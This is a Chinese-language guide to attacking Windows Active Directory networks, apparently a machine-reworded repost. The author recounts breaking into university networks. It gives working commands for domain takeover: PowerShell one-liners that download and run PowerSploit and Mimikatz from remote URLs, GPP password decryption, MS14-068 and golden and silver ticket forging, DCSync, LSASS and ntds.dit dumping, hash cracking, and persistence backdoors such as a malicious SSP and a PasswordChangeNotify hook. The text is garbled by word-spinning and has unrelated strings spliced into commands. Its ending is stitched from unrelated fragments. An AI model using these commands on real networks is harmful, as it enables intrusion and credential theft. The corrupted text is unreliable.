在没作业之前我终年搞各种高校的 *** ,鸿沟口缝隙多简略进入而内网机器环境多不严厉真是内网渗透的好当地,毕竟被誉为”校园杀手”,之前搞校园 *** 简略而粗爆许多内网知识都不明白便是各种扫,横竖校园处理员的暗码都是相同的就算不是域控暗码根柢都是相同,就算暗码不是相同都是有规则。不过没有任何意图便是一味着登录各种系统的 *** ,输入暗码按下回车键进入的 *** 。

信息搜集

网上各种前期信息搜集的文章各种net view之类的这儿就不贴了。

一般想知道哪一台是域控知道自己内网的DNS就能够了,一般域控设备都有设备DNS有些不止一台,其次是通过扫描获取敞开端口为389机器或许运用nltest指令检查。毕竟便是各种net view检查域控是哪台主机

nltest /DCLIST:pentest.com

这儿运用PowerTools中的PowerView信息搜集其实许多功用都是net指令这儿只是以PowerShell *** 结束

Powershell.exe -Nop -NonI -Exec Bypass "IEX (New.ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1');Get-HostIP"

更详细参阅：域渗透信息搜集PowerTools

Get-NetDomain                   -   gets the name of the current user's domainGet-NetForest                   -   gets the forest associated with the current user's domainGet-NetForestDomains            -   gets all domains for the current forestGet-NetDomainControllers        -   gets the domain controllers for the current computer's domainGet-NetCurrentUser              -   gets the current [domain]usernameGet-NetUser                     -   returns all user objects, or the user specified (wildcard specifiable)Get-NetUserSPNs                 -   gets all user ServicePrincipalNamesGet-NetOUs                      -   gets data for domain organization unitsGet-NetGUIDOUs                  -   finds domain OUs linked to a specific GUIDInvoke-NetUserAdd               -   adds a local or domain userGet-NetGroups                   -   gets a list of all current groups in the domainGet-NetGroup                    -   gets data for each user in a specified domain groupGet-NetLocalGroups              -   gets a list of localgroups on a remote host or hostsGet-NetLocalGroup               -   gets the members of a localgroup on a remote host or hostsGet-NetLocalServices            -   gets a list of running services/paths on a remote host or hostsInvoke-NetGroupUserAdd          -   adds a user to a specified local or domain groupGet-NetComputers                -   gets a list of all current servers in the domainGet-NetFileServers              -   get a list of file servers used by current domain usersGet-NetShare                    -   gets share information for a specified serverGet-NetLoggedon                 -   gets users actively logged onto a specified serverGet-NetSessions                 -   gets active sessions on a specified serverGet-NetFileSessions             -   returned combined Get-NetSessions and Get-NetFilesGet-NetConnections              -   gets active connections to a specific server resource (share)Get-NetFiles                    -   gets open files on a serverGet-NetProcesses               movshellcode_handler, eax  -   gets the remote processes and owners on a remote server

 

获取域 *** SYSVOL

SYSVOL是指存储域公共文件服务器副本的同享文件夹，它们在域中全部的域控制器之间仿制。 Sysvol文件夹是设备AD时创立的，它用来寄存GPO、Script等信息。一同，寄存在Sysvol文件夹中的信息，会仿制到域中全部DC上。

运用Group Policy Preferences配备组战略批量批改用户本地处理员暗码

开端->处理东西->组战略处理->在这个域中创立GPO

设置-右键-批改-用户配备-首选项-控制面板设置-本地用户和组

更新Administrator暗码：

域服务器一般都会同享这个文件夹,或许搜索其时机器下的XML文件将包括凭据：groups.xml、scheduledtasks.xml、Services.xml、datasources.xml。

映射驱动（Drives.xml）

数据源（DataSources.xml）

打印机配备（Printers.xml）

创立/更新服务（Services.xml）

计划使命（ScheduledTasks.xml）

因为通过身份验证的用户（任何域用户或受信赖域中的用户）具有对SYSVOL的读取权限

192.168.50.205sysvolpentest.comPolicies{84017B64-2662-4BA3-A06C-FB953CCBE92D}UserPreferencesGroups.xml

通过AES-256位加密

cpassword="fUCMHAw9I2PdYRZEBMS54IvtPHX3ni44qRkWtfBtxoA"

能够运用AES私钥解密GPP暗码

微软在MSDN上发布了AES加密密钥（同享密钥）

https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx

运用PowerShell脚本解密

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1

寻找SYSVOL里的暗码和侵犯GPP（组战略偏好）

Windows Server 2008 R2之四处理Sysvol文件夹

SYSVOL中查找暗码并运用组战略首选项

运用SYSVOL复原组战略中保存的密

防：

在用于处理GPO的核算机上设备KB2962486,以避免将新凭据置于组战略首选项中。 设置Everyone访问权限 不在组战略中运用域控暗码 设置同享文件夹SYSVOL的访问权限 删去现有的GPP里包括暗码的xml文件。MS14-068 Kerberos

Kerberos是西方神话中护卫阴间之门的三头犬的姓名。只所以运用这个姓名是因为Kerberos需求三方的一同参加，才干结束一次事务处理。

Kerberos 是Windows活动目录中运用的客户/服务器认证协议，为通讯两边供给双向身份认证。彼此认证或恳求服务的实体被称为委托人（principal）。参加的中心服务器被称为密钥分发中心（简称KDC）。KDC有两个服务组成：身份验证服务（Authentication Server，简称AS）和收据颁发服务（Ticket Granting Server，简称TGS）。在Windows域环境下，身份验证服务和收据颁发服务可一同工作在任何可写域控服务器上。

更多阅览:

Kerberos协议的乱用

Kerberos的作业原理

最根柢的问题在于权限特点证书能够被假造,权限特点证书中存储帐号用户名、ID、组成员等信息,把握域用户一些根柢信息就能够获取域处理员权限

攻2 PWD击者能够有用地重写有用的Kerberos TGT身份验证收据，使其成为域处理员（和企业处理员）

https://github.com/bidord/pykek/archive/master.zip

https://github.com/gentilkiwi/mimikatz/releases/

apt-get install krb5-userapt-get injustbtcwillhelpu@firemail.ccstall rdate

MS14-068进程：

恳求没有PAC的Kerberos TGT认证收据作为规范用户，DC回复TGT 生成一个假造的PAC，没有密钥，所以生成的PAC运用域用户的暗码数据用MD5算法而不是HMAC_MD5“签名”。 作为TGS服务收据恳求的一部分，运用假造的PAC作为授权数据发送无PAC的TGT到DC。 DC好像被这个稠浊了，所以它抛弃了用户发送的不含PAC的TGT，创立一个新的TGT，并将假造的PAC刺进到它自己的授权数据中，并将这个TGT发送给用户。 这个假造PAC的TGT使得用户能够成为易受侵犯的DC上的域处理员。

whoami /userpython ms14-068.py -u 域用户@域名 -p 暗码 -s 用户SID -d 域主机

发生缓存的收据,在其时Kali下生成之后再放到域用户机器中

运用mimikat *** 西将得到的TGT_domainuser@SERVER.COM.ccache写入内存，创立缓存证书：

mimikatz.exe "kerberos::ptc c:TGT_darthsidious@pentest.com.ccache" exit

klist 检查

net use k: pentest.comc$

dir k:

相关材料:

Kerberos东西包PyKEK

深化解读MS14-068缝隙

Kerberos安全缝隙

防：

设备检查KB3011780的设备

SPN扫描

Kerberoast能够作为一个有用的 *** 从Active Directory中以一般用户的身份提取服务帐户凭据，无需向方针系统发送任何数据包

SPN 是服务在运用 Kerberos 身份验证的 *** 上的仅有标识符。 它由服务类、主机名和端口组成。 在运用 Kerberos 身份验证的 *** 中，有必要在内置核算机帐户（如 NetworkService 或 LocalSystem）或用户帐户下为服务器注册 SPN。 关于内置帐户，SPN 将主动进行注册。 但是，假设在域用户帐户下工作服务，则有必要为要运用的帐户手动注册 SPN。

SPN扫描的首要长处是，SPN扫描不需求连接到 *** 上的每个IP来检查服务端口,SPN通过LDAP查询向域控实行服务发现，spn查询是kerberos收据行为一部分,因此比较难检测SPN扫描。

powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-P *** SSQLServers'); Discover-P *** SSQLServers"

扫描SQL Server脚本

Import-Module .Get-SQLServerAccess.p *** 1

PS C:Get-SqlServer-Escalate-CheckAccess [*] ---------------------------------------------------------------------- [*] Start Time: 04/01/2014 10:00:00 [*] Domain: mydomain.com [*] DC: dc1.mydomain.com [*] Getting list of SQL Server instances from DC as mydomainmyuser... [*] 5 SQL Server instances found in LDAP. [*] Attempting to login into 5 SQL Server instances as mydomainmyuser... [*] ---------------------------------------------------------------------- [-] Failed   - server1.mydomain.com is not responding to pings [-] Failed   - server2.mydomain.com (192.168.1.102) is up, but authentication/query failed [+] SUCCESS! - server3.mydomain.com,1433 (192.168.1.103) - Sysadmin: No - SvcIsDA: No  [+] SUCCESS! - server3.mydomain.comSQLEXPRESS (192.168.1.103) - Sysadmin: No - SvcIsDA: No [+] SUCCESS! - server4.mydomain.comAppData (192.168.1.104) - Sysadmin: Yes - SvcIsDA: Yes              [*] ---------------------------------------------------------------------- [*] 3 of 5 SQL Server instances could be accessed.        

 [*] End Time: 04/01/2014 10:02:00       [*] Total Time: 00:02:00 [*] ----------------------------------------------------------------------

通过LDAP从ADS获取SQL Server的列表，然后试图用其时域用户登陆每一个SQL Server。这次将输出到CSV文件中。

PS C:Get-SQLServerAccess -ShowSum | export-csv c:tempsql-server-excessive-privs.csv[*] ----------------------------------------------------------------------[*] Start Time: 04/01/2014 10:00:00[*] Domain: mydomain.com[*] DC: dc1.mydomain.com[*] Getting list of SQL Server instances from DC as mydomainmyuser...[*] 5 SQL Server instances found in LDAP.[*] Attempting to login into 5 SQL Server instances as mydomainmyuser...[*] ----------------------------------------------------------------------[-] Failed   - server1.mydomain.com is not responding to pings[-] Failed   - server2.mydomain.com (192.168.1.102) is up, but authentication/query failed[+] SUCCESS! - server3.mydomain.com,1433 (192.168.1.103) - Sysadmin: No - SvcIsDA: No [+] SUCCESS! - server3.mydomain.comSQLEXPRESS (192.168.1.103) - Sysadmin: No - SvcIsDA: No[+] SUCCESS! - server4.mydomain.comAppData (192.168.1.104) - Sysadmin: Yes - SvcIsDA: Yes             [*] ----------------------------------------------------------------------[*] 3 of 5 SQL Server instances could be accessed.        [*] End Time: 04/01/2014 10:02:00      [*] Total Time: 00:02:00[*] ----------------------------------------------------------------------

弱口令猜解

Get-SQLServerAccess -sqluser sa -sqlpass 123qwe!@#

寻找敏感数据

Get-SQLServerAccess -query "select name as 'Databases' from master..sysdatabases where HAS_DBACCESS(name) = 1"

更多参阅：

非扫描式的SQL Server发现

相关材料：

SPN扫描

扫描SQLServer脚本

Kerberos黄金门票

https://adsecurity.org/?p=1640

域服务账号破解实践

kerberos认证原理

深刻了解windows安全认证机制ntlm & Kerberos

Kerberos身份验证流程

暗码转换为NTLM哈希值，时刻戳运用散列加密，并作为身份验证收据（TGT）恳求（AS-REQ）中的身份验证器发送给KDC。 域控制器（KDC）检查用户信息（登录约束，组成员身份等）并创立票证颁发票证（TGT）。 TGT被加密，签名并交付给用户（AS-REP）。只需域中的Kerberos服务（KR *** GT）才干翻开并读取TGT数据。 用户在恳求票证颁发服务（TGS）票证（TGS-REQ）时向TG提交TGT。DC翻开TGT并验证PAC校验和 – 假设DC能够翻开票证和校验和签出，则TGT =有用。TGT中的数据被有用地仿制来创立TGS收据。 运用方针服务帐户的NTLM暗码散列对TGS进行加密并发送给用户（TGS-REP）。 用户在恰当的端口上连接到保管服务的服务器并出现TGS（AP-REQ）。该服务运用其NTLM暗码散列翻开TGS票证。

其实能够说是一种后门而不是什么缝隙。

黄金收据是假造TGT,能够获取任何Kerberos服务权限,与域控制器没有AS-REQ或AS-REP（进程1和2）通讯。因为黄金收据是假造的TGT，它作为TGS-REQ的一部分被发送到域控制器以取得服务收据。

Kerberos黄金票证是有用的TGT Kerberos票证，因为它是由域Kerberos帐户（KR *** GT）加密/签名的 。TGT仅用于向域控制器上的KDC服务证明用户已被其他域控制器认证。TGT被KR *** GT暗码散列加密并且能够被域中的任何KDC服务解密的事实证明它是有用的

运用条件：

1.一般域用户

2.krbtgt ntlm hash

3.域SID

在域上抓取hash

lsadump::dcsync /domain:pentest.com /user:krbtgt

kerberos::purgekerberos::golden /admin:administrator /domain:域 /sid:SID /krbtgt:hash值 /ticket:adinistrator.kiribikerberos::ptt administrator.kiribikerberos::tgtnet use k: pentest.comc$

Kerberos银票务

侵犯者怎样运用Kerberos银票来运用系统

https://www.feiworks.com/wy/drops/域渗透——Pass%20The%20Ticket.pdf

黄金收据和白银收据的一些差异:

Golden Ticket: 假造TGT,能够获取任何Kerberos服务权限

Silver Ticket: 假造TGS,只能访问指定的服务

加密 *** 不同:

Golden Ticket 由krbtgt的hash加密

Silver Ticket 由服务账号(一般为核算机账户)Hash加密

认证流程不同:

Golden Ticket在运用的进程需求同域控通讯

Silver Ticket在运用的进程不需求同域控通讯

用户在恰当的端口上连接到保管服务的服务器并出现TGS（AP-REQ）。该服务运用其NTLM暗码散列翻开TGS票证。

与域控制器没有AS-REQ / AS-REP（进程1和2），也没有TGS-REQ / TGS-REP（进程3和4）通讯。因为银票是假造的TGS，所以没有与域控制器通讯。

银票是假造的Kerberos票证颁发服务（TGS）收据，也称为服务收据。

域上获取信息

mimikatz log "sekurlsa::logonpasswords"

首要需求取得如下信息:

/domain

/sid

/target:方针服务器的域名全称，此处为域控的全称

/service:方针服务器上面的kerberos服务，此处为cifs

/rc4:核算机账户的NTLM hash，域控主机的核算机账户

/user:要假造的用户名，此处可用silver检验

mimikatz.exe "kerberos::golden /domain:域 /sid:SID /target:域全称 /service:要访问的服务 /rc4:NTLM /user:silver /ptt"

就能够访问域的cifs同享，访问其它是不可的,Silver Ticket是假造的TGS，也便是说其规模有限，只能访问指定的服务权限

域服务账号破解

与上面SPN扫描相似的原理

https://github.com/nidem/kerberoast

获取全部用作SPN的帐户

setspn -T PENTEST.com -Q */*

从Mimikatz的ram中提取取得的门票

kerberos::list /export

用rgsrepcrack破解

tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

没复现成功

凭据偷盗

最常用的手法域处理登录前史记载,记住获取某鸿沟权限一个然后抓取hash并没有域处理的,可能是搞的动态有点大,处理员第二天上去把马给清除了,还好留了有后门再次抓取hash直接获取到域处理员。

大多数Active Directory处理员运用用户帐户登录到其作业站，然后运用RunAs（将其处理凭据放置在本地作业站上）或RDP连接到服务器工作Mimikatz 读取暗码，搜集暗码检验登录处理员机器一般只需域处理员登录过的机器抓取都能够获取域控了

防： 处理员不应该拿着域用户去登录web服务器或许邮件服务器一但这些被攻破抓取的暗码便是域了

ARP

毕竟才是ARP诈骗不到毕竟不要拿出来。

Responder

cain

ettercap

BDFProxy

 

获取AD Hash

侵犯者怎样转储Active Directory数据库

活动目录数据库（ntds.dit）

Active Directory域数据库存储在ntds.dit文件中（默许存储在c:WindowsNTDS中,AD数据库是Jet数据库引擎，它运用供给数据存储和索引服务的可扩展存储引擎（ESE）ESE级索引使方针特点能够快速定位。ESE保证数据库契合ACID（原子性，一致性，阻隔性和耐久性） – 买卖中的全部操作结束或不实行。AD ESE数据库十分快速和牢靠。

目录分区

ntds.dit文件由三个主表组成：数据表，链接表和SD表。

详细详细材料检查:

https://technet.microsoft.com/en-us/library/cc772829(v=ws.10).aspx

运用VSS卷影副本

什么是卷影副本?

卷影副本，也称为快照，是存储在 Data Protection Manager (DPM) 服务器上的副本的时刻点副本。副本是文件服务器上单个卷的受保护同享、文件夹和文件的完好时刻点副本。

支撑操作系统：

Windows Server 2003, Windows Server 2008, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012, Windows 8

一般拿下一台服务器时预备内网渗透，需求传你的东西到方针机器中，并且是耐久渗透的这种，为了不被发现！获取系统SAM文件等

运用VSS卷影副本（通过WMI或PowerShell长途处理）长途提取ntds.dit

Windows有一个名为WMI的内置处理组件，支撑长途实行（需求处理员权限）。WMIC是在长途核算机上实行指令的WMI指令东西。

运用WMIC（或PowerShell长途处理）创立（或仿制现有的）VSS。

wmic /node:AD /user:PENTESTAdministrator /password:123qweQWE!@# process call create "cmd /c vssadmin create shadow /for=c: 2>&1 > c:vss.log"

检查vss.log

wmic /node:AD /user:PENTESTadministrator /password:123qwe!@#!@# process call create "cmd /c copy 卷影IDWindowsNTDSNTDS.dit C:windowstempNTDS.dit 2>&1"

wmic /node:AD /user:PENTESTadministrator /password:123qwe!@# process call create "cmd /c copy 卷影IDWindowsSystem32configSYSTEM c:windowstempSYSTEM.hive 2>&1"

net use k: pentest.comc$

运用这种 *** 能够和上面的Kerberos票结合来结束

运用DIT Snapshot Viewer能够验证我们是否成功地取得了ntds.dit文件。

https://github.com/yosqueoy/ditsnap

NTDSUtil获取ntds.dit文件

Ntdsutil.exe是一个为Active Directory供给处理设备的指令行东西。

运用NTDSUTIL的IFM创立（VSS卷影副本）在DC上本地引证ntds.dit

NTDSUtil是本地处理AD DB的指令实用程序（ntds.dit），并为DCPromo启用IFM集创立。IFM与DCPromo一同用于“从媒体设备”,因此被晋级的服务器不需求通过 *** 从另一个DC仿制域数据。

ntdsutil "ac i ntds" "ifm" "create full c:temp" q q

当创立一个IFM时，VSS快照被拍照，挂载，ntds.dit文件和相关数据被仿制到方针文件夹中。

此指令也能够通过WMI或PowerShell长途实行。

PowerShell提取ntds.dit

运用PowerSploit的Invoke-NinjaCopy长途提取ntds.dit（需求在方针DC上启用PowerShell长途处理功用）。

Invoke-NinaCopy是一个PowerShell函数，它能够运用PowerShell长途处理（有必要在方针DC上启用PowerShell长途处理），从长途核算机上仿制文件（即便文件已确定，可直接访问文件）。

https://github.com/PowerShellMafia/PowerSploit

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1'); Invoke-NinjaCopy -Path "C:windowsntdsntds.dit" -ComputerName "AD" -LocalDestination "C:tempntds.dit"

运用Mimikatz提取

运用Mimikatz在提取Active Directory hash

mimikatz lsadump::lsa /inject exit

运用RID 502的帐户是KR *** GT帐户，运用RID 500的帐户是域的默许处理员。

获取对Active Directory数据库文件的访问权限（ntds.dit）

Active Directory数据库（ntds.dit）包括有关Active Directory域中全部方针的全部信息

该文件还包括全部域用户和核算机帐户的暗码哈希值。

有时候域控晋级等会把ntds.dit备份文件可从同享服务器中找到能够不必直接从域控制仿制

运用Mimikatz转储LSASS内存

sekurlsa::minidump c:templsass.dmp

运用使命处理器（获取域处理员凭据）转储LSASS内存

运用PowerShell Mimikatz

运用PowerShell

域必需求能上网不然这 *** 不可用

powershell IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -Command '"privilege::debug" "LSADump::LSA /inject" exit'

无程获取

Powershell IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -Command ‘”privilege::debug” “LSADump:LSA /inject”‘ -Computer pentest.com

Mimikatz的DCSync

运用Mimikatz的DCSync 长途转储Active Directory凭据

它有用地”模仿”域控制器并向方针域控制器恳求帐户暗码数据。

运用Mimikatz的DCSync和相应的权限，侵犯者能够通过 *** 从域控制器中提取暗码散列以及曾经的暗码散列，而无需交互式登录或仿制Active Directory数据库文件（ntds.dit）

工作DCSync需求特别权限。处理员，域处理员或企业处理员以及域控制器核算机帐户的任何成员都能够工作DCSync来提取暗码数据。请注意，只读域控制器不只能够默许为用户提取暗码数据。

提取 KR *** GT用户帐户的暗码数据：

Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user：krbtgt"exit

处理员用户帐户提取暗码数据：

Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user：Administrator" exit

NTDS.dit中提取哈希

从NTDS.dit中提取哈希

提取出来的文件通过ntdsdump是无法提取的通过esedbexport来康复。

设备：

wget https://github.com/libyal/libesedb/releases/download/20170121/libesedb-experimental-20170121.tar.gz`apt-get install autoconf automake autopoint libtool pkg-config./configuremakemake installldconfig

esedbexport -m tables ntds.dit

大约需求(20-30分钟)

毕竟生成在./ntds.dit.export/

运用ntdsxtract提取域信息

git clone https://github.com/csababarta/ntdsxtract.gitpython setup.py build && python setup.py install

提取hash: (这儿需求将刚拷出来的三个文件中的system仿制到其时目录下)

$ dsusers.py ntds.dit.export/datatable.3 ntds.dit.export/link_table.5 output --syshive SYSTEM --passwordhashes --pwdformat ocl --ntoutfile ntout --lmoutfile lmout |tee all_user_info.txt

这样提取出来之[root@centos01 ~]# passwd -S cx后已经是转换成hashcat可破解的格局

hashcat -m 1000 ntout ./password.txt

 

AD耐久化活动目录耐久 ***

https://adsecurity.org/?p=1929

DS康复形式暗码保护

DSRM暗码同步

DSRM暗码同步将域控权限耐久化

获取到域控权限后怎样运用DSRM暗码同步将域管权限耐久化。

Windows Server 2008 需求设备KB961320补丁才支撑DSRM暗码同步，Windows Server 2003不支撑DSRM暗码同步。

KB961320

https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni

巧用DSRM暗码同步将域控权限耐久化

http://drops.xmd5.com/static/drops/tips-9297.html

同步之后运用法国佬神器（mimikatz）检查krbtgt用户和SAM中Administrator的NTLM值。

能够看到两个账户的NTLM值相同，阐明的确同步成功

批改注册表答应DSRM账户长途访问

批改注册表 hkey_local_machineSystemCurrentControlSetControlLsa 途径下的 DSRMAdminLogonBehavior 的值为2。

系统默许不存在DSRMAdminLogonBehavior，请手动增加。

运用HASH长途登录域控

DSRM账户是域控的本地处理员账户，并非域的处理员帐户。所以DSRM暗码同步之后并不会影响域的处理员帐户。

事情检查器的安全事情中挑选事情ID为4794的事情日志，来判别域管是否常常进行DSRM暗码同步操作。

缓解 ***

关于这个问题的仅有有用的缓解 *** 便是保证每一台域控制器的DSRM账户暗码是仅有的并且守时批改此暗码。一同，保证注册表DsrmAdminLogonBehavior的值不为2，更好将其直接删去或许设置其值为1或0。

Security Support Provider

https://adsecurity.org/?p=1760

http://www.evil0x.com/posts/11354.html

直译为安全支撑供给者 又叫Security Package.

简略的了解为SSP便是一个DLL，用来结束身份认证

将mimilib.dll仿制到域控c:/windows/system32下

设置SSP

批改域控注册表方位：

HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Lsa/Security Packages/

Memory Updating of SSPs

privilege::debug

misc::memssp

这样就不需求重启

c:/windows/system32可看到新生成的文件kiwissp.log

假设不是在域环境下生成的文件会在 system32mimilsa.log

防：

检测注册表方位：

HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Lsa/Security Packages/

检测%windir%/System32是否有可疑dll

SID前史

https://adsecurity.org/?p=1772

SID前史记载答应另一个帐户的访问被有用地克隆到另一个帐户

AppRiver—首要是用来检查依据SaaS的邮件和 *** 东西的通讯安全。

mimikatz "privilege::debug" "misc::addsid bobafett ADSAdministrator"

AdminSDHolder＆SDProp

运用AdminSDHolder＆SDProp（从头）获取域处理权限

https://adsecurity.org/?p=1906

AdminSDHolder是坐落Active Directory中的系统分区

 

组战略

https://adsecurity.org/?p=2716

战略方针在耐久化及横向渗透中的运用

组战略概述

组战略使处理员能够处理Active Directory中的核算机和用户。组战略保存为组战略方针（GPO）

侵犯者能够乱用GPO，通过诈骗 *** 进一步主动化地传达恶意软件、结束耐久化驻留意图

恶意软件能够运用GPO穿越IDS/IPS等防火墙，毕竟访问到域内全部的系统。

GPO的另一长处便是侵犯进程期间并不需求方针系统在线，一旦离线状态下的方针系统从头登录到域中，恶意的GPO载荷就会被投递到方针系统。

组战略默许情况下每90分钟（域控制器5分钟）可包括安全选项，注册表项，软件设备以及发动和关闭脚本以及域成员改写组战略设置。这意味着组战略在方针核算机上实行配备的设置。

SYSVOL是全部通过身份验证的用户具有读取权限的Active Directory中的域规模同享。SYSVOL包括登录脚本，组战略数据以及其他域控制器中需求运用的全域数据。

SYSVOL同享将主动同步并在全部域控制器之间同享。

其实我以为组战略也相当于远控,能够把配备脚本让域内的每一台电脑都种上马批量实行一遍。

或许每周在全部域上工作Mimikatz获取明文暗码,以及获取某种类型文件这要通过编写脚本结束。

长途搜索某个本地文件（如proof.txt）

Get-Content <list of IPs> | ForEach-Object {Getwmiobject CIM_DataFile -filter »Drive=’c:’ AND Filename=’proof’ AND extension=’txt’ -Impersonate 3 -computername $_ | Select PSComputername, Name -Unique}

一篇文章通晓PowerShell Empire 2.3（上）

防：

守时审阅GPO。

为GPO运用界说明晰的命名约好

记载GPO的创立动作

Hook PasswordChangeNotify

http://wooyun.jozxing.cc/static/drops/tips-13079.html

介绍一个愈加荫蔽且不需求运用Mimikatz的后门 *** ，通过Hook PasswordChangeNotify阻拦批改的帐户暗码。

在批改域控暗码时会进行如下同步操作：

a. 当批改域控暗码时，LSA首要调用PasswordFileter来判别新暗码是否契合暗码复杂度要求

b. 假设契合，LSA接着调用PasswordChangeNotify在系统上同步更新暗码

函数PasswordChangeNotify存在于rassfm.dll

poc下载地址：
https://github.com/clymb3r/Misc-Windows-Hacking

运用VS2015开发环境，MFC设置为在静态库中运用MFC

编译工程，生成HookPasswordChange.dll

下载Powershell的dll注入脚本

https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1

在代码尾部增加如下代码：

Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll –procname lsass

并命名为HookPasswordChangeNotify.ps1

上传HookPasswordChangeNotify.ps1和HookPasswordChange.dll

处理员权限实行：

PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1

将获取到的暗码上传到http服务器:

http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html

 

Other Kerberos AD 认证进程 Kerberos & KR *** GT帐号介绍 lapsg了解 Active Directory侵犯和防护资源 烂马铃薯 – 从服务帐户到系统的特权晋级 Mimikatz 非官方文档 linux/UNIX/BSD 的后期渗透思路 Metasploit 的后期渗透思路

文章不免有些当地会错请指证，或许有哪类内网渗透各种技巧能够发给我 qq 604865997，到时候我将会收拾成书本印出来免费送一本。

本文由安全客原创发布
如若转载，请注明出处： https://www.anquanke.com/post/id/92646

黑客技术网:内网浸透常识大总结

一同在其时目录下生成的netstat.tx

t,保存系统链接情况身份认证：例如域控制器，SSO，人力资源系统，VPN，DNS，DHCP等;10、检查、保存最近三天系统文件批改情况最近，我的一个朋友同享了一个幽默的恶意样本，它是一个微软快捷 *** 文件（LNK文件），在用户点击实行后导致感染。此前，我并不了解这种类型的侵犯前语，但在搜索引擎行进行了简略的查询之后，我发现自2017年以来，这种类型的侵犯就有所增加，我感觉很惊讶。在这篇文章中，我们将分析LNK文件恶意软件，并提示侵犯者是怎样运用多层稠浊来逃避反病毒软件，并毕竟投进恶意二进制文件的。我们还将对每一层进行反稠浊，并了解代码的实践作用。内网渗透知识大总结

黑客技术网/data/data/(packageName)/files目录，即运用一般文件，目录获取 *** ：File file = getFilesDir()6. 再次点击“设备”，不会设备闪现的zip文件。SET KEY=HKEY_CURRENT_USERSoftwareClassesCLSID{11111111-1111-1111-1111-111111111111}InProcServer32

在分析config.jar存档文件时，我们发现它还包括了登录名和暗码等能够通过Web界面访问用户账户的全部必要数据。尽管暗码在存档文件中处于加密情况，但在免费东西和开源暗码数据库的帮忙下，黑客完全有才干通过哈希解密来破解暗码。并且，在账户的初始注册阶段，暗码设置要求并不凌乱，即没有长度、特别字符等要求。因此，这也在很大程度上降低了黑客破解暗码的难度。MD5：1A971FE12C5D630C52365D3C46F40B06 nCmdSetResourceIntegerProperty,黑客技术网

一辆车内有多种CAN总线，为了结束A/C系统的翻开和关闭，我们需求找到正确的CAN工作总线，以福特Fusion来说，其间至少符号有4个总线，其间3个为工作500kbps的高速率CAN总线HS1、HS2、HS3，1个为工作125kbps的中速CAN总线MS。 今天上班产品司理说：公司的短信验证码剩余运用量为0我想检验一下特斯拉ModelS、本田City2017，或是三菱MonteroSport2017，希望我有机会在本年的DEFCON上对展示车辆的表面板或信息文娱系统上手检验一番。其他，我还需求点现金，终究车可不廉价……所以我觉得仍是借朋友的车来检验一下好了。https://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation

持有状态机的父类 发生布景AllowedDNSSuffixes : {} }内网渗透知识大总结

黑客技术网不同的指令会使照应信息发生一些改动，但是关于大多数控制指令而言，照应信息的 *** 根柢如下：不过这款软件是收费的，

分为许多个版别，企业版，规范版，服务器版和Mac版。

这个时分就能够运用数据库的update指令去更改暗码，比如说新的暗码是“woshitiancai”，就能够写update users set passwd=md5("woshitiancai") where userid='1';系统开发途径Hello 49黑客技术网

最近在研讨Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)的进程中接触到了cpl文件，所以对其做了进一步研讨，发现了一些幽默的细节，同享给我们。 　　Apple ID 关于宽广锋友来说一点都不陌生，用苹果设备的根柢离不开它，往常一般用于三个商铺（App Store、iTunes Store、 Apple Store 线上商铺）和四大服务（Apple Music、iCloud、iMessage 、FaceTime）。至于其他用途其实也不少，比如 Game Center 、Apple 支撑社区、“查找我的朋友”、“查找我的 iPhone”功用等等。内网渗透知识大总结

183.0.0.0 183.63.255.255 41943044.Create the whitelist

雇佣一个渗透检验公司寻找你的 *** 缺陷。遵照他们的建议进行少量的配备更改，比如删去 Web 服务器上的旧文件与重命名文件。假设陈说闪现你的 *** 安全功用高，你应该感到高兴。衡量你的行进并守时地向处理层陈说。

本文标题:黑客技术网:内网浸透常识大总结